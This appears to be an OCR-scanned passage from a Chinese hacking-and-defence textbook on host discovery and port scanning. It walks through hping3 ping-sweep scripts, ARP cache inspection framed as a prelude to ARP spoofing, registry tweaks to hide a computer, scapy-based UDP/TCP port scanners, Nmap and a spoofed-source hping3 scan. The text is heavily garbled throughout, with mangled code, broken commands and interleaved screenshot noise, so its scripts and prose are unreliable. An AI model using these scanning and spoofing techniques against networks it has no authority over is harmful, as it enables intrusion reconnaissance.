#!/bin/bash 
if [ "S$#" -ne 1 ] ;then 
./hping udp.sh [/24 


echo "Usage -— 


network addressil” 


echo “Excample — /hping udp:=h 
下 号 
echo “EXample will perform a UDP 


Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt file™ 
exit 
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fi 
prefix=$ (echo $1 | 
# 去 除 IP 地 址 前 三 段 
for addr in sftseg 1 200]2>G5 
# 使 用 循环 遍历 1-200 
hping3 Sprehx. Saddr 一 一 dp 一己 1 >> 
r.txt  # 将 结果 保存 到 r .txt 文 件 当 中 


done 


# 使 用 grep 过 滤 出 存活 主机 的 IP 地 址 ， 将 其 保存 
到 output .txt 文 件 中 
Eep ro Unrealie ge ER 在 二 于 二 


二 二 汪汪 人 条 本 一 站 全 二 二 ED EYE 
rm r.txt 二 删除 临时 文件 


使 用 hping3 192.168.1.103 -c 1 命令 ， 
可 以 对 该 地 址 实现 基于 TCP 的 扫描 ， 执 行 效 
果 如 下 图 所 示 O 


oot@kali:~# hping3 192.168.1.163 -cC 1 
PING 192,.158.1,163 [eth 192.168,1,1063):; NO FLAGS are set，46 headers + 0 data bytes 
en=46 ip=192.168.1.183 ttl=]128 id=17@ sport=@ flags=RA seq=@ Wwin=8 rtt=7.8 ms 


Rn 7 0 EF | 


-- 192.168.1.163 hping statistic --- 
packets transmitted, 1 packets received, g% packet loss 
ound-trip min/avg/max = 7.8/7.8/7.8 ms 


下 面 给 出 一 段 基 于 TCP 的 shell 肢 本， 使 
用 该 脚本 可 以 自动 进行 TCP 扫 描 ， 具 体 代 码 
如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ];then 
echo -hping tcp sh 1/24 


"Usage -一 
network address]" 


Echo ExcCammnle /Hping Ecp= sh 
下 
echo "EXample will perform a TCP 


Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt file" 
exit 
fi 
prefix=$ (echo $1 | 
# 去 除 IP 地 址 前 三 段 
for addr jin $(seq 1 200);do 
# 使 用 循环 遍历 1-200 
hping3 Sprehx: Saddr 一 C 1 >> rr.txt 
# 将 结果 保存 到 r .txt 文 件 当中 
done 
# 筛选 出 以 len 开 头 的 字段 ， 并 保存 到 output . 
tx 文件 中 
rep “Len re txt | cut dd 
eu — =f 2 .29> 9 G0tnut Etat 


# 删 除 临 时 文件 


1 


二 到 这 | 


Tn 


(多 注意 : hping3 工 具 在 发 送 TCP 数 据 包 时 与 
其 他 工具 不 同 ， 它 发 送 的 TCP 数 据 包 flags 字 
段 全 部 都 是 0， 如 下 图 所 示 。 


~ Transmission Control Protocol, Src Port: 2552, Dst Port: ©, Seq: 1, Len: 9 
Source Port: 2552 
Destination Port: © 
[Stream index: 4] 
[TCP Segment Len: @| 
Sequence number: 1 (relative sequence number) 

[Next sequence number: 1 (relative Sedquence number)] 

， Acknowledgment number: 1343128849 

g161 .... = Header Length: 29 bytes (5) 

r Flags: 9x9096 (<None>) 

9906. .... .... = Reserved: Not set 
‘0 .... .= Nonce: Not set 

,ge@...。...， = Congestion Window 

。 sas ssesns ECN-Echo: Not Set 

ss oc00s Urgent: Not Set 

.1B ,,,，= Acknowledgment : 


Reduced {CWR):; Not set 


NDt set 
.. 日 ... = Push: Not set 
. .0.. = Reset: Not set 


[TCP Flags 


在 扫描 完成 后 ， 如 果 主 机 存活 会 回复 
一 个 ACK+RST 的 数据 包 ， 回 复数 据 包 格 式 
如 下 图 所 示 。 


Source Port: © 
Destination Port: 2569 
[Stream index: B] 
[TCP Segment | ; B] 
sequence number: 1 f tive numl 
[Next sequence number: 1 relative quen number)] 
Ackn edgment number; 1 relativ k nl 】 
9161 Header Length: 26 byt 
8D6 一 Re eserved: No CE Se 
= Nonc t 
mle rt wind Red | (CWR): t 
ECN-Echo: Not s 
日 Urgent: Not set 
1 = Acknowledgment; Set 
0 Push; Not set 
B Syn: Not Set 
sa es = Fin: Not t 
[TCP Flags:; +++:...:A:R..] 


练 1 一 一 查看 系统 中 的 ARP 缓 存 表 


在 利用 网 络 欺 骗 攻 击 的 过 程 中 ， 经 常 
用 到 的 一 种 欺骗 方式 是 ARP 欺 骗 ， 但 在 实 
施 ARP 欺 骗 之 前 ， 需 要 查看 ARP 绥 存 表 。 那 
么 如 何 查看 系统 的 ARP 绥 存 表 信息 呢 ? 
具体 的 操作 步骤 如 下 : 

右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
二 省 行 ” 菜 单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd 
A 图 所 示 。 


10.5 
实战 演 


Windows 将 展 握 你 所 输入 的 冬 称 ， 为 你 打开 柜 应 的 程序 . 
文件 夹 、 文 档 或 Internet 资源 。 


orm 


加 


取消 


EE 


浏览 (B).. 


单 击 “ 确 定 ” 按 钮 ， 打 开 “ 
es 如 下 图 所 示 。 


命令 提示 


站 


第 10 章 


BN C:\windows\system32\cmd,exe 


rSAAdministrator> 


[sep 国 在 “ 
命令 ， 按 Enter 键 执 和 
本 机 系 
“ 生 呈 


EB C:\windows\system32\cmd,exe 


[hi 耻 本 10.0. 105: 


D015 crosoft Lorporat1ono 


5 


f4-83 


a4-be-6bC 


命令 提示 符 ” 


物理 地 址 


从 无 线 网 络 渗透 内 网 


corporation。 人 怀 留 所 有 祝 逢 | 。 


窗口 中 输入 arp -a 
于 命令 ， Bp 可 显 -J 未 出 


统 的 ARP 缓 存 表 中 的 内 容 ， 如 下 图 


40-a5-ef-de-a9-d: 


»-b0-0 


192. 168. 0. 255 


EL 


step[ 在 “命令 一 示 符 ” 窗 


命令 ， Rs 执 行 命 


一 口 x 
促 久 有 所有权 冬 
-cd-$33-00-14 
| 16 了 
-0c-cc-dl 
_ff_ff_ff 去 


口中 输入 arp -d 
令 ， 即 可 删除 ARP 


表 中 所 有 的 内 容 ， 如 下 图 所 示 。 


BC:\windows\system32\cmd.exe 


224. 0. 0. 251 


224. 0. 0. 252 


1-00-5e-00-00-ftb 


1-00-be-00-00-fc 


J1-00-5e-i?f-ff-fa 


机 


ers\Admnistrator>arp -d 


dministrator 


实战 帝 
自己 


练 2 一 一 在 “网 络 邻 居中 隐藏 


如 果 不 想 让 别人 在 “网 络 邻 居 ” 中 看 
到 目 己 的 计算 机 ， 则 可 把 自己 的 计算 机 名 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


称 在 “网 络 邻 导 ” 里 隐藏 ， 具 体 的 操作 步 
又 如 下 : 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 
regedit 命 令 ， 如 下 图 所 示 。 

5 x 


Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 相应 的 程序 、 
本 文件 夫 、 文 栏 或 Internet 资源 。 


ao 
a 


浏览 (B).… 


[Se 国 单 击 “ 确 定 ” 按 钮 打开 “注册 表 纺 
辑 器 ”窗口 ， 如 下 图 所 示 。 


男 注册 表 编 辑 高 一 口 x 
文件 (日 ” 编 辐 (E) ”这 千 (V) ”收藏 夫 (A) ”帮助 (H) 
v 国 计算 机 名 称 类 型 


; -| HKEY_ CLASSES_ROOT 
; -| | HKEY_CURRENT_USER 
; -| | HKEY LOCAL MACHINE 
; -| | HKEY_USERS 
| | HKEY CURRENT_CONFIG 


在 “注册 表 编 辑 器 ”窗口 中 ， 展 开 分 
支 到 HKEY LOCAL MACHINE\SYSTEM\ 
CurrentControlSet\Services\LanManServer\ 


Parameters 选 项 下 ， 如 下 图 所 示 。 


甘 注册 直 闫 镶 基 
文件 上 昌 。 振 缉 ([E) 至 震 (V) 收藏 玉 (和) 孝 忆 (H) 
:kmlcop ^ || 名 称 类型 轨 庆 
: :- 国 KSecDD ED REG SZ ( 数 信 未 设置) 
: | ~ Ksecpkg 多 AdjustedNullssssi.。 REG DWORD Ox00000003 [3) 
: -KtmRm 加 auwiodisconnedct REG_DWORD 0x0000000f (15 
v.- 量 ! 了 Sen BEnableAuthenticat.. REG DWORD 0x00000000 [0) 
[DD Niases 钢 enableforcedlogoff REG_DWORD oOx00000001 [1) 
一 ep 区 enablesecuntysign,.. REG_DWORD 0x00000000 [0) 
-| | Linkage dg ee ee 
~ NullSessionPipes REG_MULTLSZ 
FsctAllowlist requiresecuritysig., REG_DWOND 0x00000000 [0) 
_ 国 shereproviders 钢 restricmnullsessacc- REG DWORD 0x00000001 [1) 
| 才 Shores 到 ServiceDl REG_EXPAND_SZ 。 %SystemRoct36 
| | ， 量 Lanmenworksiaion 轩 中 内 SorvicsDBUniosdO REG DWORD ”| OO000000 (1) 
: : 》 国 Idap 区 
| i -| lfsvc 
| .| LicanseManager 
; |; 加 ltdic 
和 -Idsvc 
i | Imhosts Y 
< > < 


计 豆 NHKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 
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选中 Hidden 选 项 并 右 击 ， 从 弹出 的 快 
捷 菜 单 中 选择 “修改 ”菜单 项 ， 打 开 “ 编 
辑 字符 串 ” 对 话 框 ， 如 下 图 所 示 。 


党 缉 字 符 韦 xX 


数值 匀称 (N): 
数值 数据 (V): 


CO 
[ww | mw 


在 “数值 数据 ”文本 框 中 将 dword 类 
键 值 从 0 设置 为 1， 如 下 图 所 示 。 


编辑 字符 这 xX 


数值 冬 称 (N): 
数值 数据 (V): 


nh | 

a 
单 击 “ 确 定 ” 按 钮 ， 就 可 以 在 “网 
络 邻 居 ” 中 隐藏 自己 的 计算 机 ， 如 下 图 
所 示 。 


唑 | 因 风 :|1P = 上 关 
| 文 4 国志 二 时 = 0 
一 “个 啼 ， 聊 E23 也 

， 噶 快速 访问 ~ 计算 机 (2) 

”时 WY msex 
”用 视频 > 
，[ 琶 | 图 片 [a 
、 恒 疾 于 DESKTOP-D5KF15E 
;时 人 营 
Y 网 络 论 施 (1) 

》 小 诗 乐 
， 国 点 画 > Wireless N Router TL-WR886N 
》 2 Windows10 (C: 
”二 软件 (D:) 
”入 文档 (E:) 
局 本 地 磋 盘 (Fj 。 、 

3 个 项 目 上 = 贺 


小 试 身 手 


认识 扫描 工具 Nmap。 

使 用 工具 进行 二 层 扫描 。 
使 用 工具 进行 三 层 扫描 。 
使 用 工具 进行 四 层 扫描 。 


10.6 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


种 11 重 ” 扫 折 无 线 网 络 中 的 主机 


不 同 的 服务 通过 不 同 的 端口 提供 服务 ， 先 识别 主机 中 开放 了 哪些 端口 ， 再 根据 端口 确 


定 主机 开放 了 哪些 服务 。 本 章 介 和 


召 如何 对 无 线 网 络 中 的 存活 主机 进行 各 种 扫描 ， 主 要 包括 


扫描 UDP 端口 、 扫 描 TCP 端 口 、 扫 描 Banner 人 信息、 扫描 SNMP 协 议 等 。 


11.1 扫描 主 机 疹 口 


如 果 把 IP 地 址 比 作 一 闻 房 子 ， 问 口 就 
是 出 入 这 间 房 子 的 门 。 真 正 的 房子 只 有 几 
个 门 ， 但 是 一 个 IP 地 址 的 端口 可 以 有 65536 
个 之 多 。 端 口 是 通 过 端口 号 来 标记 的 ， 范 
围 是 从 0 到 65535。 每 一 个 端口 对 应 一 
络 应 用 或 应 用 端 程序 ， 因 此 ， 黑 客 通 过 开 
放 的 端口 可 以 入 侵 系 统 漏 洞 ， 所 以 发 现 主 
机 开放 的 端口 就 变 得 尤为 重要 。 


11.1.1 扫 朱 UDP 痛 口 


扫描 UDP 端口 与 扫描 UDP 主机 是 不 同 
的 ， 虽 然 使 用 的 技术 相同 。 扫 摘 UDP 端 口 
只 针对 目标 主机 不 啊 应 ， 以 此 判断 UDP 端 
口 打开 ， 而 对 于 有 啊 应 则 认定 是 没有 开放 
UDP 端口 。 


1. scapy 工 具 


使 用 scapy 编 写 python 肢 本 自动 化 端口 
扫描 程序 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import 大 
# 导 入 时 间 库 
# 导 入 系统 库 
If lenl(sys.argv) !=4: 
# 如果 输入 的 参数 不 是 4, 做 出 提示 
print"Usage dp Sen port py 
[Target -IP|] [Fiest Port][Last Port]”" 
J ocan port 


import time 
import sys 


print"Example 
Lp 2: TE Wn I 


print "Example will UDP port Scan 
BOorts Utneoum io00 onli92 T1081 
Sys.exit() 
ip = sys.argv[1] # 取 出 参数 中 的 IP 地 址 
Port1lLl = int (sys.argv[2]) 
# 取 出 参数 中 的 第 一 个 端口 号 
port2 = int(sys.argv[3]) 
# 取 出 参数 中 的 第 二 个 端口 号 
FO DOrt 37 Tangelportl porta): 
# 以 给 定 端 口 的 范围 进行 扫描 
# 构 建 UDP 数 据 包 进 行 发 送 
a = Srl1 (IP(dst=ip) /UDP (dport=port), 
timeout=0.1,verbose=0) 
time .sleep (1)# 延 时 1s 


if a==None:# 如 果 没 有 返回 数据 认为 端口 开放 加 ces me 


print port# 将 该 端口 打印 输出 
else: 
pass 


应 用 上 述 编 码 ， 可 以 扫描 主机 开放 的 
端口 信息 。 


2. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 UDP 端 口 ， 具 
体操 作 步 骤 如 下 : 
使 用 Nmap -sU 192.168.1.103 命 令 ， 扫 
描 主 机 IP 地 址 为 192.168.1.103 的 端口 信息 ， 
执行 效果 如 下 图 所 示 。 如 果 没 有 指定 端口 
号 ， 默 认 情 况 下 ，Nmap 会 扫描 常用 的 1000 
个 端口 己 。 


root@kali:~# nmap -SU 192.168.1.103 
starting Nmap 7.79 ( https://nmap.org ) at 2018-19-26 94:97 EDT 
Nmap scan report for 192.168.1.103 

Host is up (0.0030s latency). 

Not shown: 992 closed ports 

PORT STATE SERVICE 

123/udp open ntp 

137/udp open netbios-ns 
138/udp open|fiLtered netbivs-dgm 
445/udp open|filtered microsoft-ds 
S509/udp open|filtered isakmp 

1925/udp open|filtered blackjack 
19860/udp open|filtered upnp 

A4560/udp open|filtered nat-t-i 

MAC Address: O00:0C:29:A2:4E:907 0 


Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds 


~ 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


指定 端口 进行 扫描 ， 使 用 Nmap -sU 
192.168.1.103 -p 123 合 令 。 如 果 端 口 开放 ， 
执行 效果 如 下 图 所 示 。 


root@Kkali:~# nmap -SU 192.168.1.163 -p 123 
starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 04:13 EDT 


Nmap Scan report for 192.168.1.103 
Host is up (6.00034s Latency 1 . 


PORT STATE SERVICE 
123/udp open ntp 
MAC Address: 00:9C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds 


使 用 Nmap -SU 192.168.1.103 -p 888 命 
邻 ， 如 果 端 口 不 开放 ， 执 行 效 果 如 下 图 所 
示 。 如 果 需 要 扫描 多 个 端口 使 用 “-” 进 行 
分 割 ， 如 -p 1-65535， 进 行 全 端口 打 描 。 

root@Kkali:~# nmap -SU 192.168.1.1063 -p 888 
starting Nmap 7.70 ( https:/,nmap.org ) at 2018-10-26 04:15 EDT 


Nmap scan report for 192.168.1.103 
Host is up (6.00048s Latency | . 


PORT STATE SERVICE 
888/udp closed accessbuilder 
MAC Address: O00:0C:29:A2:4E:97 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds 


侈 提示 : Nmap 还 支持 从 文件 中 读 取 地 址 列 
表 进 行 端口 扫描 ， 使 用 的 命令 为 Nmap -iL 
addrtxt -SU -p 1-333。 


器 和 11.1.2 ”扫描 TCP 端 吕 


全 扫描 TCP 端 口 要 比 扫 描 UDP 主 机 复杂 ， 

它 是 基于 TCP 连 接 协议 的 扫描 ， 其 中 包括 
隐蔽 扫描 、 全 连接 扫描 、 中 间 人 扫描 ， 这 
些 众 多 扫描 方式 都 是 基于 三 次 握手 的 变化 
来 完成 的 。 


1. 隐蔽 扫描 


隐蔽 扫描 主要 是 通过 向 目标 主机 特定 
端口 发 送 SYN 包 。 如 果 目 标 主机 回复 RST 数 
据 包 ， 隐 蔽 扫描 则 根据 回复 数据 包 ， 来 判 
断 主机 端口 是 否 开 放 ， 由 于 没有 建立 完整 
连接 ， 所 以 应 用 日 志 不 记录 扫描 行为 ， 从 
而 达到 一 定 程度 的 隐蔽 。 

(1) scapy 工具 。 使 用 scapy 实施 隐 
蔽 扫描 ， 使 用 a=srl(IP(dst="192.168.1.1")/ 
TCP(flags='S'), timeout=1) 命令 ， 给 目标 主 
机 发 送 SYN 包 ， 目 标 主 机 回复 SYN/ACK 
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数据 包 ， 使 用 wirshark 抓 包 可 以 看 到 除 此 
之 外 还 多 出 一 个 RST 数据 包 ， 这 是 由 于 操 
作 系 统 不 知道 SYN 包 的 发 送 ， 因 此 当 目 标 
主机 发 送 SYN/ACK 时 便 自动 回复 RST 数 
据 包 ， 执 行 效 果 如 下 图 所 示 。 


Destination Protocol Length Info 
192.168.1.1 TCcP 54 20 — 8 [SYN] Seq=B Win=8192 Len=g 
192.1658.24.191 TGP 6B 60 — 28 [SYN, ACK Set ACK=1 Wi 


这 里 给 出 一 段 python 脚 本 实现 TCP 自 动 
扫描 的 代码 ， 具 体 代码 如 下 : 


#!/usr/bin/python 


DO Togging 
import subprocess 
logging.getLogger(" scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
import sys 
if lenl(sys.argv) !=4: 
# 如 果 输 入 参数 不 是 4, 做 出 提示 
print Usdgele /sy ca By Liarget 
=PllFEFirst PortillLast Paoartl” 
print"Example 
hp 7 : Ew 
print "Example will TCP SYN scan port 
scan ports 1 through 100 on 192.168.1.1" 
SYS .exit() 
ip = sys.argv[1]# 获 取 IP 地 址 
portl = int (sys.argv[2])# 获 取 起 始 端 口 
port2 = int (sys.argv[3])# 获 取 结 束 端 口 
for Port in range(lportl port2}: 
# 循 环 遍历 端口 区 段 
# 构 造 TCP 数 据 包 并 发 送 
a = srl(IP(dst=ip)/TCP (dport=port), 
timeout=0.1,verbose=0) 


# 如 果 数 据 为 空 不 做 处 理 


es 


if a==None: 
pass 
else: 
if int (a[lTCP] .flags==18): 
# 判 断 返 回 数据 包 TCP 标 记 为 18，, 即 SYN/ACK 
print port  # 打 印 出 端口 
else: 
pass 


(2) Nmap 工具 。 使 用 Nmap 扫描 相对 
比较 简单 ， 直 接 使 用 工具 ， 然 后 添加 啊 应 
的 参数 ， 即 可 完成 扫描 。 具 体 的 方法 为 : 
使 用 Nmap 192.168.1.103 -p 1-200 命 令 扫 
描 ， 默 认 情 况 下 ，Nmap 工具 使 用 SYN 方 
式 来 扫描 端口 。 扫 描 结果 如 下 图 所 示 。 


root@kali:~/Test/port# nmap 192.168.1.163 -p I-205 

starting Nmap 7.76 ( https://nmap.org ) at 29018-19-26 65:37 EDT 
Nmap scan report for 192.168,1.103 

Host is up (9.000335 Latency 1 . 

Not shown: 198 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

MAC Address: ODO:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds 


另外 ， 可 以 使 用 Nmap -sS 192.168.1. 
103 -p 1-200 命 令 ， 指 定 使 用 SYN 包 的 方式 
进行 扫描 ， 其 扫描 结果 是 一 样 的 。 还 可 以 
使 用 Nmap -sS 192.168.1.103 -p 1-65535 或 
Nmap -sS 192.168.1.103 -p- 命 令 ， 实 现 全 端 
口 扫描 。 
食 提示: 如 果 目 标 主机 被 防火 墙 过 滤 ， 
可 能 会 有 一 些 非 open 状 态 的 端口 被 显示 ， 
此 时 可 以 通过 加 入 --open 进 行 过 滤 ， 只 显 
示 open 状 态 的 端口 。 如 果 有 多 个 不 连续 的 
端口 可 以 使 用 “，” 进 行 分 隔 ， 如 “80， 
85，135” 这 样 。 


(3)hping3 工具 。 使 用 hping3 192.168.1. 
103 --scan 100-200 -S 命令 ， 实 现 对 100 ~ 200 
端口 扫描 ， 使 用 SYN 包 的 方式 ，hping3 显 
示 出 来 的 结果 条 例 更 清晰 一 些 。 类 似 表格 
的 形式 如 下 图 所 示 。 


root@kali:~/Test/port# hping3 192.168.1.103 --scan 100-260 -9 
Scanning 192.168.1.1603 (192.168.1.103), port 100-269 
161 ports to scan, use -V to see all the repLies 

由 ----+-----------+--------- 十 --- 十 ----- 十 ----- 十 ----- 十 


|port| Serv name | TLags |itl| id | win | len | 

十 ---- 十 - ---------- +--------- +---+----- +----- 十 - ---- 十 
135 Loc-Srv : .5..A... 128 14687 16616 46 
139 netbios-ssn: .5..A... 128 15111 16616 46 

ALL repLies received. Done. 

Not responding ports: 


另外 ， 使 用 hping3 -c 200 -S --spoof 
192.168.1.155 -p ++1 192.168.1.103 命 令 ， 实 
现 欺骗 扫描 。 

从 1 这 个 端口 开始 扫描 ， 每 次 端口 
加 1 总 共 发 送 200 个 数据 包 ， 伪 造 地 址 
“192.168.1.155”， 要 扫描 的 目标 地 址 为 
“192.168.1.103”， 这 样 做 的 优点 是 隐 
蔽 ， 缺 点 是 本 机 无 法 查看 到 结果 ， 可 以 
通过 交换 机 镜像 端口 ， 或 者 是 有 权 查 看 
192.168.1.155 才 可 以 。 


2. 全 连接 扫描 
直接 与 目标 主机 建立 三 次 握手 ， 如 果 
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能 够 建立 三 次 握手 证 明 主 机 端口 开放 。 全 
连接 扫描 的 优点 是 结果 准确 ， 缺 点 是 完 
参 露 没有 隐蔽 。 

(1) scapy 工具 。 直 接 使 用 脚本 建立 三 
次 握手 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 

Import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 

from scapy.all import * 

# 发 送 SYN 包 

response = srll(IP(dst="192.168.1.1") 
/TCP (dport=80,flags="S")) 

# 第 二 次 发 送 使 用 目标 主机 返回 的 seq 值 将 其 +1 处 
理 ， 这 样 构成 一 个 完整 通信 

reply = srl(IP(dst="192.168.1.1")/ 
TCP (dport= 80,flags="A",ack= (response 
[TCP] .seqt+1))) 


提出 猜想 ， 之 前 通过 发 送 数 据 包 了 解 
到 ， 系 统 会 自动 回复 RST 包 ， 修 改 脚本 验证 
猜想 ， 使 得 发 送 数据 显示 出 来 。 修 改 后 的 
代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.-.all import 六 
# 构 造 SYN 包 
i 
TCP (dprot=80,flags="S") 
plnte SENT 
# 在 终端 打印 出 一 个 发 送 标记 
SYN .display () # 在 终端 显示 数据 包 内 容 
Dein Vnn RECELYVEDNS 
# 在 终端 打印 发 送 结 束 标记 
response = Srl(SYN,timeout=1, 
Verbose=0)  # 将 构造 好 的 SYN 包 发 送出 去 
response.display() 
# 在 终端 打印 返回 的 数据 包 
if int (response[TCP] .flags)==18: 
# 判 断 回复 的 是 否 为 SYNVRCK 
Doin nn “SEN = 
# 再 次 打印 发 送 标记 
# 构 造 返 回 包 
A = IP(dqst="192.168.1.1")VTCP (dport= 
80,fags="A'" ,ack= (response[TCP] .seql+1)) 
A.display() # 展 现 构造 好 的 数据 包 
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print"\n\n-- RECEIVED --"# 打 印 结 束 标记 ###[ IP ]### ###[ TCP J### 
version =4 sport = http 
response2=srl(A,timeout=1,verbo ihl = 5 dport = ftp data 
> 、 tos = OQxO seq = 3865475985 
se=0) # 将 构造 好 的 数据 包 发送 ee 0 下 
response2.dqisplay()# 在 终端 打印 返回 数据 包 id = 39496 dataofs = 5 
下 flags = reserved =0 
下 人 frag = 9 flags =R 
print SYN-ACEK not returned ttl = 64 Eo = 0 i 
proto = tcp chksum = 9XC9C 
# 如 果 端 口 不 开放 ， 打印 提示 chksum = 0x5cdl urgptr =0 
src = 192.168.1.1 options = [] 
使 用 上 述 代 人 码 进 行 扫 描 的 操作 步 双 dst = 192.168.1.161 ###[ Padding ]### 
\options _\ load = 'NXx90N\x99N\X99N\X90N\x99N\x99 


如 下 : 


3 step 罗 使 用 Wirshark 抓 包工 具 抓 取 通 信 过 
ss 国 | 发 送 第 一 个 SYN 数 据 包 ， 如 下 图 sm 国 通 


程 ， 再 次 验证 猜想 ， 可 以 发 现 有 5 个 数据 


所 示 
包 ， 主 机 发 送 SYN 数 据 包 ， 目 标 主机 回复 
op SENT 0 
few ITP De ###[ le _ ftp datd SYN/ACK 数 据 包 ， 操 作 系 统 回 复 RST 数 
iht = None dport = http 据 包 ， 此 时 已 经 中 断 连接 ， 主 机 再 次 发 送 
tos = OxO seq = 9 
Len = None ack = 6 ; 向 示 子 香 
a 0 ACK 数 据 包 ， 目 标 主 机 回复 RST 数 据 包 ， 
me eo et 整个 通信 过 程 如 下 图 所 示 。 
tt 本 window = 8192 Destination Protocol Length Info 
proto = tcp chksum = None : 54 20 -86 
chksum = None urgptr = 0 
src = 192.168.1.101 options = [] 
dst = 192.168.1.1 
\options \ -- RECEIVED -- 


使 用 iptables -A OUTPUT -p tcp --tcp- 
flags RST RST -d 192.168.1.1 -j DROP 命 令 ， 


系统 自 带 防火 墙 设 置 过 滤 ， 但 不 自动 发 送 


step 辆 这 时 会 返回 SYN/ACK 数 据 包 内 容 ， 
如 下 图 所 示 D 


凑 郑 闪 [| IP 】 尹 多 天 ###[ TCP ]### 、 
version =4 sport = http RST 数 据 包 ， o 使 用 iptables - 工 命令 ， 检 查 防 
ihl = 5 dport = ftp data 
tos = Ox0 seq = 3865475985 火 墙 规则 是 否 生 效 ， 如 下 图 所 示 。 

Len = 44 ack = 1 
id = 39495 dataofs = 6 Foote@kali:-/Test/port# iptables -TL 
flags = DF reserved =0 chain INPUT (policy ACCEPT) 
frag =0 flags = SA Karget prot opt source destination 
ttl = 64 window = 16384 Fhain FORWARD (policy ACCEPT) 
proto = tcp chksum = OX7202 Karget prot opt source destination 
chksum = Oxlcce urgptr = 0 ， 

- ， hain OUTPUT (policy ACCEPT) 
Src = 192.168.1.1 optlions = [('MSS', 1460)] rot prot opt source destination 
dst = 192.168.1.101 ###[ Padding ]### DROP tcp -- anywhere gateway tcp flags:RST/RST 
\options _\\ load = '\xO0\x00' 


再 次 运行 脚本 ， 查 看 最 后 一 次 返回 数 
据 ， 如 下 图 所 示 。 由 此 看 来 三 次 握手 正常 


[step 轿 此 时 满足 条 件 ， 因 此 构建 第 二 个 ACK 
数据 包 ， 如 下 图 所 示 。 


###[ IP ]### Hi#[ TCP J i# 尖 ##[ IP ]### 到 ###[ TCP 地 

version = 4 sport = ftp_data version = 4 sport = http 
ih\ = None dport = http ihl = 5 dport = ftp data 
tos = 9xg seq = 0 tos = 90xg9 seq = 805120079 
Len = None ack = 3865475985 Len = 40 ack = 1 
jd = 1 dataofs = None id = 40580 dataofs =5 
flags reserved = 0 flags = DF reserved =0 

加 ftLaas mm \ frag = 0 flags = 从 
frag = ep ttl = 64 window = 16384 
tt\ -和风 window -Ss proto = tcp chksum = Qx936c 
proto = tcp chksum = None chksum = OQx1895 urgptr = 日 
chksum = None urgptr = 0 src = 192.168.1.1 options = [] 
src = 192.168.1.161 options = [【] dst = 192.168.1.101 |###[ Padding ]### 
dst = 192.168.1.1 - -RECEIVED -- Noptions \ load = '\x00\xQO\xOO0\xOO0\XO0\x00 
\options \\ 


通过 Wirshark 抓 包工 具 抓 取 通 信 过 
程 ， 如 下 图 所 示 。 


192.168.1.1 TCP 54 28 ~ 86 [SYN] Seq=6 Win=8192 Len=B 
192,168,1.101 TCP G9 88 ~ 2 [SYN, ACK] Seq=8 Ack=1 Win=16384 Len=g MSS=1468 


构建 完成 后 ， 返 回 的 数据 包 如 下 图 
所 示 。 
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(2) Nmap 工具 。Nmap 工具 本 身上 自 带 
了 全 连接 扫描 功能 ， 用 户 使 用 简单 的 命令 
配置 即 可 完成 TCP 端口 扫描 ， 具 体 的 操作 
步骤 如 下 : 
使 用 Nmap -sT 192.168.1.103 -p 135 命 
令 ， 对 主机 特定 端口 实施 全 连接 扫描 ， 如 
下 图 所 示 。 


root@katli:~# nmap -ST 192.168.1.163 -p 135 
tarting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 22:23 ED 
map scan report for 192.168.1.103 
Host is up (06.00035s Latency | . 


PORT STATE SERVICE 
35/tcp open msrpc 
AC Address: O00:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds 


使 用 Nmap -sT 192.168.1.103 -p 1-200 
命令 ， 可 以 对 区 间 的 端口 进行 扫描 ， 如 下 
图 所 示 。 


root@kali:~# nmap -sT 192.168.1.103 -p 1-200 
Starting Nmap 7.70 ( https://,nmap.org ) at 2018-10-26 22:29 EDT 
te scan report for 192.168.1.103 

ost is Up (6.090019s latency). 

Not shown: 198 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

MAC Address: 900:9C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds 


[step 图 使 用 Nmap -sT 192.168.1.103 -p 
135,445,555 命 令 ， 对 一 组 端口 进行 打 描 ， 
如 下 图 所 示 0 


Foot@Katl1i:~# nmap -sl L92.168.1.193 -p LI35,445,555 
starting Nmap 7.70 ( https://,nmap.org ) at 2018-10-26 22:27 EDT 
Nmap scan report for 192.168.1.103 
Host is up (06.00048s Latency | . 


PORT STATE 
135/tcp open 
45/tcp open 
S55/tcp closed dsf 

MAC Address: 00:0C:29:A2:4E:07 (VMware) 


SERVICE 
msrpc 
microsoft-ds 


Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds 


如 果 没 有 提供 端口 ， 默 认 情况 下 
Nmap 会 自动 扫描 1000 个 常用 端口 ， 如 下 图 
所 示 。 


